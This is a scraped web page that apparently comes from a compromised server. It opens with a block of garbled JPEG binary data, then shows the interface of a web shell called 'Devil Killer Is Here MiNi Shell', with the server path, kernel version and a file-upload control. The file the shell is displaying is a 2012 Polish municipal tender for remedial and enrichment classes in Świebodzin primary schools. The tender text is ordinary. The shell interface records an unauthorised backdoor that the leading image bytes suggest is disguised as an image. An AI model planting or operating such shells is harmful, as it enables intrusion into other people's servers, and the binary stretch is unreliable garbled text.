JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120217/39731-N-2012.html

<p class="kh_header"><b>Świebodzin: Prowadzenie zajęć dodatkowych w ramach projektu Indywidualizacja procesu nauczania w klasach I-III szkół podstawowych Gminy Świebodzin z podziałem na 5 grup</b><br>
<b>Numer ogłoszenia: 39731 - 2012; data zamieszczenia: 17.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świebodzin , ul. Rynkowa 2, 66-200 Świebodzin, woj. lubuskie, tel. 68 4750916, faks 68 4750916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.swiebodzin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć dodatkowych w ramach projektu Indywidualizacja procesu nauczania w klasach I-III szkół podstawowych Gminy Świebodzin z podziałem na 5 grup.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Kompleksowe świadczenie usługi edukacyjnej p.n.: Prowadzenie zajęć dodatkowych w ramach projektu Indywidualizacja procesu nauczania w klasach I-III szkół podstawowych Gminy Świebodzin  z podziałem na 5 grup:
Grupa 1:  Publiczna Szkoła Podstawowa nr 2 w Świebodzinie, Park Chopina 1, 66-200 Świebodzin, 
Grupa 2: Publiczna Szkoła Podstawowa nr 6  w Świebodzinie, Os. Łużyckie 28, 66-200 Świebodzin,  
Grupa 3:  Publiczna Szkoła Podstawowa nr 7 im. Janusza Korczaka, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin,
Grupa 4:  Publiczna Szkoła Podstawowa  im. Marii Konopnickiej,  Gościkowo 10, 66-200 Świebodzin ,
Grupa 5:  Zajęcia terapeutyczne -hipoterapia dla uczniów Publicznej Szkoły Podstawowej nr 2 w Świebodzinie.
współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, poddziałanie 9.1.2. -Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. 
1.1 Grupa 1:Publiczna Szkoła Podstawowa nr 2 w Świebodzinie, Park Chopina 1 , 66-200 Świebodzin, obejmuje przeprowadzanie następujących zajęć dodatkowych :
1)Zadanie 1:Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu:
-II semestr  2011/ 2012 -  1 grupa 32 h,
-I semestr 2012/2013 - 1 grupa 32 h, 
-II semestr  2012/2013-  1 grupa -32h.
Razem: 96 h (1h-godzina lekcyjna- 45 minut)
2)Zadanie 2:Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych: 
-II semestr  2011/ 2012-  2 grupy- 64 h, każda grupa po 32 h,  
-I semestr 2012/2013 - 2 grupy -64 h, każda grupa po 32 h,
-II semestr 2012/2013 -  2 grupy -64h, każda grupa po 32 h,
Razem: 192 h (1h-godzina lekcyjna 45 minut)
3) Zadanie 3: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy: 
-II semestr  2011/ 2012 - 2 grupy- 64 h, każda grupa po32 h,   
-I semestr 2012/2013- 2 grupy- 64 h, każda grupa po 32 h,  
-II semestr 2012/2013 -  2 grupy -64h, każda grupa po 32 h,  
Razem: 192 godziny (1h- godzina zegarowa- 60 minut)
4) Zadanie 4:Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej: 
-II semestr 2011/ 2012-  1 grupa 32 h,
-I semestr 2012/2013  -1 grupa 32 h,
-II semestr 2012/2013  - 1 grupa -32h,
Razem :96 godzin(1h-godzina zegarowa -60 minut)
5) Zadanie 5: Gimnastyka korekcyjna dla dzieci z wadami postawy:
-II semestr  2011/ 2012-  1 grupa 64 h, 
-I semestr 2012/2013 -1 grupa 64 h, 
-II semestr 2012/2013-  1 grupa -64h,
Razem: 192 h (1h-godzina lekcyjna -45 minut)
6) Zadanie 6:Specjalistyczne zajęcia terapeutyczne -ADHD: 
-II semestr 2011/ 2012-  1 grupa 32 h,
-I semestr 2012/2013-1 grupa 32 h,
-II semestr 2012/2013-1 grupa -32h,
Razem: 96 godzin(1h -godzina zegarowa- 60 minut)
7) Zadanie 7: Zajęcia rozwijające zainteresowania uczniów wybitnie, szczególnie uzdolnionych -koło matematyczne: 
-II semestr 2011/ 2012-1 grupa 64 h, 
-I semestr 2012/2013 -1 grupa 64 h,
-II semestr 2012/2013-1 grupa -64h,
Razem: 192 h (1h -godzina lekcyjna- 45 minut)
8) Zadanie 8:Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych -koło młodego przyrodnika: 
-II semestr  2011/ 2012 - 1 grupa- 64 h, 
-I semestr 2012/2013- 1 grupa -64 h, 
-II semestr 2012/2013-  1 grupa -64h,
Razem: 192 h (1h -godzina lekcyjna- 45 minut)
9) Zadanie 9:Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych -język niemiecki : 
-II semestr 2011/ 2012- 2 grupy- 64 h, każda grupa po 32 h,  
-I semestr 2012/2013- 2 grupy -64 h, każda grupa po 32 h,  
- II semestr 2012/2013-  2 grupy -64h, każda grupa po32 h,  
Razem: 192 h (1h-godzina lekcyjna -45 minut)
10) Zadanie 10: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych -zajęcia plastyczno-muzyczne:  
-II semestr 2011/ 2012-  2 grupy- 64 h, każda grupa po 32 h,  
-I semestr 2012/2013 -  2 grupy- 64 h, każda grupa po 32 h,  
-II semestr 2012/2013 -  2 grupy -64h, każda grupa po 32 h,  
Razem: 192 h (1h-godzina lekcyjna- 45 minut)
11) Zadanie 11:Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych -teatralne: 
-II semestr 2011/ 201- 2 grupy- 64 h, każda grupa po 32 h,  
-I semestr 2012/2013- 2 grupy -64 h, każda grupa po 32 h  
-II sem 2012/2013 -  2 grupy -64h, każda  grupa po 32 h,   
Razem: 192 h (1h-godzina lekcyjna- 45 minut)
1.2. Grupa 2: Publiczna Szkoła Podstawowa nr 6  w Świebodzinie, Os. Łużyckie 28, 66-200 Świebodzin  , obejmuje przeprowadzanie następujących zajęć dodatkowych:
1)Zadanie 1: Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu :
-II semestr 2011/ 2012- 3 grupy- 80 h,w tym: 2 grupy po 25h, 1 grupa 30h,
-I semestr 2012/2013- 3 grupy- 80 h,w tym: 2 grupy po 25h, 1 grupa 30h,
-II semestr  2012/2013-  2 grupy -80h, każda grupa po 40 h,
Razem: 240 h (1h-godzina lekcyjna -45 minut)
2) Zadanie  2: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych: 
-II semestr 2011/ 2012- 3 grupy- 90 h, każda grupa po 30 h, 
-I semestr 2012/2013 - 3 grup- 90 h, każda grupa po 30 h, 
-II semestr 2012/2013-  2 grupy -90h, każda grupa po 45h,
Razem: 270 h (1h-godzina lekcyjna- 45 minut)
3) Zadanie  3: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy: 
- II semestr 2011/ 2012 - 4 grupy- 40 h, każda grupa po 10h, 
- I semestr 2012/2013-  6 grup- 40 h, w tym: 2 grupy po 6 h, 4 grupy po 7 h,
- II semestr 2012/2013 -  4 grupy -40h, każda grupa po 10h, 
Razem: 120 godzin (1h-godzina zegarowa- 60 minut)
4) Zadanie 4:  Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej: 
-II semestr 2011/ 2012 - 1 grupa- 30 h,
-I semestr 2012/2013 - 1 grupa- 30 h,
-II semestr 2012/2013 - 1 grupa  -30h,
Razem: 90 godzin (1h-godzina zegarowa -60 minut)
5) Zadanie 5:Gimnastyka korekcyjna dla dzieci z wadami postawy:
-II semestr 2011/ 2012- 3 grupy -40 h, w tym: 2 grupy po 15 h, 1 grupa 10h, 
-I semestr 2012/2013 -   3 grupy- 40 h, w tym: 2 grupy po 15 h, 1 grupa 10h,
-II semestr 2012/2013 -  3 grupy- 40 h, w tym: 2 grupy po 15 h, 1 grupa 10h,
Razem: 120 h (1h-godzina lekcyjna- 45 minut)
6) Zadanie 6:Specjalistyczne zajęcia terapeutyczne -zajęcia rewalidacyjne: 
-II semestr 2011/ 2012- 1 grupa 15 h, 
-I semestr 2012/2013- 1 grupa 15 h,
- II semestr 2012/2013-  1 grupa -10h,
Razem: 40 godzin(1h-godzina zegarowa- 60 minut)
7) Zadanie 7:Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych: 
-II semestr 2011/ 2012- 1 grupa- 60 h, 
-I semestr 2012/2013- 2 grupy- 60 h, każda  grupa po 30h,
-II semestr 2012/2013 -  1 grupa -60h,
Razem: 180 h (1h- godzina lekcyjna- 45 minut)
8)Zadanie 8: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych -język angielski: 
-II semestr 2011/ 2012 - 1 grupa 30 h, 
-I semestr 2012/2013 -  1 grupa 30 h,
- II semestr 2012/2013 - 1 grupa -30h,
Razem: 90 h (1h-godzina lekcyjna- 45 minut)
9) Zadanie 9:  Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych -zajęcia polonistyczne : 
-II semestr 2011/ 2012- 3 grupy- 50 h, w tym: 2 grupy po 15 h, 1 grupa 20h,
-I semestr 2012/2013,-3 grupy- 50 h, w tym: 2 grupy po 15 h, 1 grupa 20h,
-II semestr 2012/2013- 3 grupy -50h, w tym: 2 grupy po 15 h, 1 grupa 20h,
Razem: 150 h (1h-godzina lekcyjna- 45 minut)
10) Zadanie 10: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych -zajęcia plastyczne:  
-II semestr 2011/ 2012- 1 grupa- 40 h, 
-I semestr 2012/2013-  1 grupa- 40 h,
-II semestr  2012/2013-  1 grupa  -40h,
Razem: 120 h (1h-godzina lekcyjna -45 minut)
11)Zadanie 11:Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych -zajęcia rozwijające umiejętności kluczowe Biblioteka to nie tylko książka 
-II semestr 2011/ 2012, 1 grupa- 20 h, 
-I semestr 2012/2013, 1 grupa- 20 h,
-II semestr  2012/2013, 1grupa -20h,
Razem: 60 h (1h-godzina lekcyjna -45 minut)
1.3. Grupa 3: Publiczna Szkoła Podstawowa nr 7 im. Janusza Korczaka, ul. Gen. Świerczewskiego 74a, 66-200 Świebodzin, , obejmuje przeprowadzanie następujących zajęć dodatkowych :
1) Zadanie 1: Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu:
-II semestr 2011/ 2012- 9 grup -138 h, w tym: 3 grupy po 16 h, 6 grup po 15 h, 
-I semestr 2012/2013- 9 grup- 138 h, w tym: 3 grupy po 16 h, 6 grup po 15 h, 
-II semestr 2012/2013 -  9 grup -138 h, w tym: 3 grupy po 16 h, 6 grup po 15 h, 
Razem: 414 godzin (1h-godzina lekcyjna- 45 minut)
2) Zadanie 2:  Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy 
-II semestr 2011/ 2012- 13 grup- 102 h w tym: 11grup po 8 h, 2 grupy po 15 h, 
-I semestr 2012/2013- 13 grup- 103 h, w tym: 12 grup po 8 h, 1 grupa 7 h,
 -II semestr 2012/2013-  13 grup -104h, każda grupa po 8 h, 
Razem: 309 godzin (1h-godzina zegarowa -60 minut)
3) Zadanie 3:Gimnastyka korekcyjna dla osób z wadami postawy: 
-II semestr 2011/ 2012- 9 grup- 138 h, w tym:  3 grupy po 16 h, 6 grup po 15 h, 
-I semestr 2012/2013-  9 grup- 138 h, w tym: 3 grupy po 16 h, 6 grup po 15 h, 
- II sem 2012/2013-  9 grup -138h, w tym: 3 grupy po 16 h, 6 grup po 15 h, 
Razem: 414 h (1h -godzina lekcyjna- 45 minut)
4) Zadanie 4: Zajęcia rozwijające zainteresowania uczniów wybitnie i szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematycznych: 
-II semestr 2011/ 2012- 2 grupy- 31 h, w tym: 1 grupa 15 h, 1 grupa 16 h, 
-I semestr 2012/2013-  2 grupy- 31 h, w tym: 1 grupa 15 h, 1 grupa 16 h, 
-II semestr 2012/2013-  2 grupy -30h, każda grupa po 15 h, 
Razem: 92 h (1h-godzina lekcyjna- 45 minut)
5) Zadanie 5:  Zajęcia rozwijające zainteresowania uczniów -koło ekologiczne: 
-II semestr 2011/ 2012- 3 grupy 46 h, w tym : 2 grupy po 15h, 1 grupa 16h, 
-I semestr 2012/2013-  3 grupy 46 h, w tym: 2 grupy po 15h, 1 grupa 16h, 
-II semestr 2012/2013- 3 grupy -46 h, w tym: 2 grupy po 15h, 1 grupa 16h, 
Razem: 138 h (1h-godzina lekcyjna- 45 minut)
1.4. Grupa 4: Publiczna Szkoła Podstawowa  im. Marii Konopnickiej,  Gościkowo 10, 66-200 Świebodzin , obejmuje przeprowadzanie następujących zajęć dodatkowych :
1)Zadanie 1: Zajęcia dla dzieci z trudnościami w czytaniu i pisaniu :
-II semestr 2011/ 2012- 1 grupa 30h,
-I semestr 2012/2013- 1 grupa 30h,
- II semestr 2012/2013  - 1 grupa 30h,
Razem: 90 h (1h- godzina lekcyjna- 45 minut)
2) Zadanie 2: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych: 
-II semestr 2011/ 2012- 1 grupa 30h,
-I semestr 2012/2013- 1 grupa 30h,
- II semestr 2012/2013  -1 grupa 30h,
Razem: 90 h (1h-godzina lekcyjna -45 minut)
3) Zadanie 3:  Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy: 
-II semestr 2011/ 2012- 1 grupa 30h,
-I semestr 2012/2013- 1 grupa 30h,
- II semestr 2012/2013- 1 grupa 30h
Razem: 90 godzin(1h-godzina zegarowa- 60 minut)
4) Zadanie 4: Zajęcia rozwijające zainteresowania uczniów wybitnie i szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych: 
-II semestr 2011/ 2012- 1 grupa 30h,
-I semestr 2012/2013- 1 grupa 30h, 
-II semestr 2012/2013 - 1 grupa 30h,
Razem: 90 h (1h-godzina lekcyjna- 45 minut)
5) Zadanie 5: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych  plastyczno-muzycznie: 
-II semestr 2011/ 2012-  1 grupa 30 h,
-I semestr 2012/2013-  1 grupa 30 h,
- II semestr 2012/2013 - 1 grupa 30h,
Razem: 90 h (1h-godzina lekcyjna- 45 minut)
1.4.1.Grupa 1, Grupa 2, Grupa 3, Grupa 4:
1) Za godzinę zajęć uznaje się zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 17 listopada 2010 roku(Dz. U. Nr 228, Poz. 1487):
-dla zajęć rozwijających uzdolnienia i zajęć dydaktyczno wyrównawczych  45 minut,
-dla zajęć specjalistycznych 60 minut . 
Zajęcia nie mogą być realizowane w czasie obowiązkowych zajęć edukacyjnych.
2) Cena brutto jednej godziny lekcyjnej albo zegarowej  zajęć obejmować będzie wszystkie poniesione koszty w czasie realizacji zamówienia w tym : koszty dojazdu na zajęcia, wynagrodzenie za pracę, podatek dochodowy, podatek VAT, składki ubezpieczenia społecznego, ubezpieczenia zdrowotnego, w tym koszty  pracodawcy,  koszt przygotowania materiałów niezbędnych do przeprowadzenia zajęć i innych materiałów wynikających z obowiązków Wykonawcy oraz wszelkie inne koszty, które Wykonawca poniesie w celu wykonania przedmiotu umowy.
1.4.2. Obowiązki Wykonawcy przy realizacji przedmiotu  zamówienia: Grupa 1, Grupa 2, Grupa 3, Grupa 4 : 
1)Wykonawca w porozumieniu z dyrektorem szkoły przygotuje program i plan zajęć pozalekcyjnych, obejmujący harmonogram oraz zakres zadań dla uczestników projektu na okres obowiązywania umowy oraz  uzgodniony z Dyrektorem Szkoły dostarczy  Zamawiającemu w terminie 7 dni od dnia zawarcia umowy.
2)Program zajęć realizowanych w projekcie powinien zawierać: 
a)cele (wyrównanie szans edukacyjnych poprzez indywidualizację procesu nauczania klas I-III szkół podstawowych Gminy Świebodzin  poprzez zapewnienie każdemu dziecku ofert edukacyjno - wychowawczo-profilaktycznej, zgodnej z jego indywidualnymi potrzebami edukacyjnymi    i możliwościami rozwojowymi), 
b)wyszczególnienie i opis metod i form realizacji programu;
c)treści programu zajęć,
d)spodziewane rezultaty.
3)Zajęcia będą odbywały się w grupach, których liczebność będzie ustalana z dyrektorem szkoły. Dyrektor szkoły, w której realizowane będą zajęcia będzie przekazywał Wykonawcy imienne wykazy osób zakwalifikowanych do udziału w zajęciach.
4)Za realizacją programu, o którym mowa w pkt. 2), zgodnie z wymogami określonymi w pkt. 3), odpowiada Wykonawca odnotowując obecność na poszczególnych zajęciach.
5)Wykonawca jest zobowiązany do prawidłowego i systematycznego prowadzenia dokumentacji projektu: dokumentowania prowadzonych zajęć w dziennikach zajęć, kartach czasu pracy, sprawozdaniach oraz bieżącej kontroli frekwencji i monitorowania osiągnięć uczestników, a także do prowadzenia dokumentacji fotograficznej zajęć;
6)Wykonawca jest zobowiązany do przekazywania Zamawiającemu pisemnych sprawozdań miesięcznych z wykonania poszczególnych zajęć wraz z kartami czasu pracy w terminie 7 dni od zakończenia każdego miesiąca, potwierdzone przez dyrektora poszczególnych szkół oraz comiesięcznego przekazywania pisemnej informacji dyrektorowi szkoły, w której realizowany jest projekt o stanie realizacji planu zajęć, w tym ilości zrealizowanych godzin; 
7)Wykonawca opracuje i przekaże Zamawiającemu raport ewaluacyjny zawierający zrealizowany zakres programu i osiągnięte rezultaty w odniesieniu do celów programu - w terminach do 15.07.2012 r., 15.01.2013 r. oraz 15.07.2013 r.. Do każdego raportu ewaluacyjnego należy dołączyć dokumentację fotograficzną na nośniku CD, obejmującą kilka zdjęć z poszczególnych rodzajów zajęć oraz akceptację raportu przez dyrektora poszczególnych szkół;
8)Wszystkie zajęcia objęte przedmiotem zamówienia będą odbywać się w szkołach podstawowych, do których uczęszczają uczestnicy zajęć. Pomieszczenia szkolne, w których będą odbywać się zajęcia zostaną udostępnione Wykonawcy bezpłatnie, który ponosi odpowiedzialność za stan powierzonego mienia.
9)Wykonawca w trakcie prowadzonych zajęć będzie korzystał z pomocy naukowych udostępnionych przez dyrektora każdej szkoły;
10)Dokumenty potwierdzające przeprowadzenie zajęć muszą być prowadzona na kartach wg wzorów oznakowanych zgodnie z wymaganiami zamawiającego.
11)Wykonawca w ramach promocji przedmiotu umowy zobowiązany jest do:
a)Oznakowania sal/przestrzeni, w których będą odbywały się zajęcia zgodnie z zasadami oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
b)Oznaczania wszelkich dokumentów wytwarzanych w czasie realizacji przedmiotu zamówienia, zgodnie z zasadami POKL.
1.5. Grupa 5:  Zajęcia terapeutyczne -hipoterapia dla uczniów Publicznej Szkoły Podstawowej nr 2 w Świebodzinie , obejmuje przeprowadzanie następujących zajęć dodatkowych :
1)Zadanie: Zajęcia terapeutyczne -  hipoterapia: 
-II semestr 2011/ 2012 -  1  grupa 32 h,  
-I semestr 2012/2013 - 1 grupa 32 h,  
-II semestr 2012/2013 -1 grupa 32h.  
Razem: 96 godzin(1h-godzina zegarowa- 60 minut)
1.5.1.  Grupa 5
1)Za godzinę zajęć uznaje się zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 17 listopada 2010 roku(Dz. U. Nr 228, Poz. 1487). godzinę zegarową- 60 minut. 
2)Cena ryczałtowa brutto jednej godziny zajęć obejmować będzie wszystkie poniesione koszty w czasie realizacji zamówienia ,w tym: koszty dojazdu na zajęcia, wynagrodzenie za pracę, podatek dochodowy, podatek VAT, składki ubezpieczenia społecznego, ubezpieczenia zdrowotnego, w tym koszty  pracodawcy,  koszt przygotowania materiałów niezbędnych do przeprowadzenia zajęć i innych materiałów wynikających z obowiązków Wykonawcy, koszt  pracy konia oraz użytkowania ujeżdżalni oraz wszelkie inne koszty, które Wykonawca poniesie w celu wykonania przedmiotu umowy.
1.5.2. Obowiązki Wykonawcy przy realizacji przedmiotu  zamówienia: Grupa  5
1)Wykonawca w porozumieniu z dyrektorem szkoły nr 2 przygotuje program i plan zajęć pozalekcyjnych obejmujący harmonogram oraz zakres zadań dla uczestników projektu na okres obowiązywania umowy oraz  uzgodniony z Dyrektorem Szkoły dostarczy  Zamawiającemu w terminie 7 dni od dnia zawarcia umowy.
2) Program zajęć realizowanych w projekcie powinien zawierać co najmniej : 
- rozgrzewkę,
- jazdę konną,
- pielęgnację konia,
- szkolenie dla opiekunów dzieci podczas zajęć hipoterapii, 
- rozgrzewka fizyczna i ćwiczenia programowe usprawniające, 
- kształtowanie świadomości w schemacie własnego ciała, 
- doskonalenie sprawności ruchowej, 
- stymulowanie zmysłów: słuchu, wzroku , dotyku , węchu,
- ćwiczenie koncentracji uwagi,
- wyzwalanie spontanicznej aktywności dziecka w pracy z koniem,
- ćwiczenia relaksacyjne.
3)Zajęcia będą odbywały się w grupach których liczebność będzie ustalana z dyrektorem szkoły. Dyrektor szkoły będzie przekazywał Wykonawcy imienne wykazy osób zakwalifikowanych do udziału w zajęciach.
4)Za realizację programu, o którym mowa w pkt.  2), zgodnie z wymogami określonymi w pkt. 3), odpowiada Wykonawca  odnotowując obecność na poszczególnych zajęciach.
5)Wykonawca jest zobowiązany do prawidłowego i systematycznego prowadzenia dokumentacji projektu: dokumentowania prowadzonych zajęć 
w dziennikach zajęć, kartach czasu pracy, sprawozdaniach oraz bieżącej kontroli frekwencji i monitorowania osiągnięć uczestników, a także do prowadzenia dokumentacji fotograficznej zajęć;
6)Wykonawca jest zobowiązany do przekazywania Zamawiającemu pisemnych sprawozdań miesięcznych z wykonania zajęć wraz z kartami czasu pracy w terminie 7 dni od zakończenia każdego miesiąca, potwierdzone przez dyrektora szkoły oraz comiesięcznego przekazywania pisemnej informacji dyrektorowi szkoły o stanie realizacji planu zajęć, w tym ilości zrealizowanych godzin; 
7)Wykonawca opracuje i przekaże Zamawiającemu raport ewaluacyjny zawierający zrealizowany zakres programu i osiągnięte rezultaty w odniesieniu do celów programu - w terminach do 15.07.2012 r., 15.01.2013 r. oraz 15.07.2013 r.. Do każdego raportu ewaluacyjnego należy dołączyć dokumentację fotograficzną na nośniku CD, obejmującą kilka zdjęć z poszczególnych rodzajów zajęć oraz akceptację raportu przez dyrektora  szkoły;
8)Zamawiający zapewni dowóz dzieci do miejsca realizacji wskazanego przez Wykonawcę.
9)Dokumenty potwierdzające przeprowadzenie zajęć muszą być prowadzona na kartach wg wzorów oznakowanych zgodnie z wymaganiami zamawiającego.
10)Wykonawca w ramach promocji przedmiotu umowy zobowiązany jest do: 
a)Oznakowania przestrzeni, w której będą odbywały się zajęcia zgodnie z zasadami oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki .
b)Oznaczania wszelkich dokumentów wytwarzanych w czasie realizacji przedmiotu zamówienia , zgodnie z zasadami POKL..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 85.31.25.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
